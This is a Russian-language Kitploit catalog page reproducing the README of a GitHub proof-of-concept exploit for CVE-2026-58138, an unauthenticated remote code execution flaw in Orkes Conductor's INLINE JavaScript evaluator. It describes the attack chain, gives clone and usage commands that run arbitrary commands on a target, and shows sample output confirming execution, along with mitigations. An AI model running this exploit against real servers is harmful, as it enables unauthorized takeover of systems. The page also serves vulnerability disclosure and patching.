Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-58138 — CVE-2026-58138 - Conductor (3.21.21..<3.30.2) unauthenticated RCE via INLINE GraalVM evaluator | Kitploit
Инструменты/GitHubGitHub/0xgh057r3c0n/cve-2026-58138
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRed Teaming
GitHub0xgh057r3c0n/cve-2026-58138

CVE-2026-58138

CVE-2026-58138 - Conductor (3.21.21..<3.30.2) unauthenticated RCE via INLINE GraalVM evaluator

Репозиторий
29 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-58138 — Conductor (3.21.21..<3.30.2) Неавторизованное удаленное выполнение кода

Orkes Conductor

Критическая уязвимость удаленного выполнения кода в Orkes Conductor

CVE Exploit Python


📋 Обзор

CVE-2026-58138 — это критическая уязвимость неавторизованного удаленного выполнения кода (RCE), затрагивающая Orkes Conductor версий с 3.21.21 по 3.30.1. Эта уязвимость позволяет атакующим выполнять произвольные команды на сервере Conductor без необходимости аутентификации, что потенциально может привести к полной компрометации системы.

🔴 Серьезность

  • Балл CVSS: 9.8 (Критический)
  • Вектор атаки: Сеть
  • Аутентификация: Не требуется
  • Воздействие: Полная компрометация системы

⚙️ Детали уязвимости

Уязвимость существует в типе задачи INLINE в движке рабочих процессов Orkes Conductor. Задача INLINE поддерживает выполнение JavaScript с доступом к Java-объектам через eval, что позволяет атакующему:

  1. Зарегистрировать вредоносный рабочий процесс, содержащий задачу INLINE с JavaScript-кодом
  2. Выполнить произвольный Java-код через Java-интероп JavaScript
  3. Выполнять системные команды на сервере Conductor через java.lang.Runtime.exec()

📦 Затронутые версии

Диапазон версийСтатус
3.21.21 - 3.30.1✅ Уязвим
> 3.30.1❌ Исправлена

🚀 Установка

root@kitploit:~
# Clone the repository
git clone https://github.com/0xgh057r3c0n/CVE-2026-58138.git
cd CVE-2026-58138

# Make the script executable
chmod +x CVE-2026-58138.py

# Verify installation
python3 CVE-2026-58138.py --help

💻 Использование

root@kitploit:~
# Basic usage
python3 CVE-2026-58138.py http://target:8080

# Custom command
python3 CVE-2026-58138.py http://target:8080 -c "whoami; id"

📊 Пример вывода

root@kitploit:~
[>] Orkes Conductor 3.21.21 - 3.30.1 Remote Code Execution
[>] Author: 0xgh057r3c0n
[>] CVE-2026-58138 Unauthenticated RCE PoC

[*] target  = http://192.168.1.100:8080
[*] command = 'id; hostname'
[+] workflow 'pwn_1742345678' registered (HTTP 200)
[+] started workflow id = 123e4567-e89b-12d3-a456-426614174000
[+] UNAUTHENTICATED RCE CONFIRMED – command output:
uid=1000(conductor) gid=1000(conductor) groups=1000(conductor)
conductor-server-6b7c8d9e0f-abc12

🛡️ Меры защиты

  1. Обновите Orkes Conductor до версии 3.30.2 или новее
  2. Отключите тип задачи INLINE, если он не требуется
  3. Ограничьте сетевой доступ к API Conductor

⚠️ Отказ от ответственности

Только для образовательных целей и исследований в области безопасности. Используйте только на системах, которыми вы владеете или на тестирование которых имеете явное разрешение.


📚 Ссылки

  • NVD — CVE-2026-58138
  • Безопасность Orkes Conductor

⭐ Полезно? Поставьте звезду на GitHub ⭐

GitHub stars

Скачать инструмент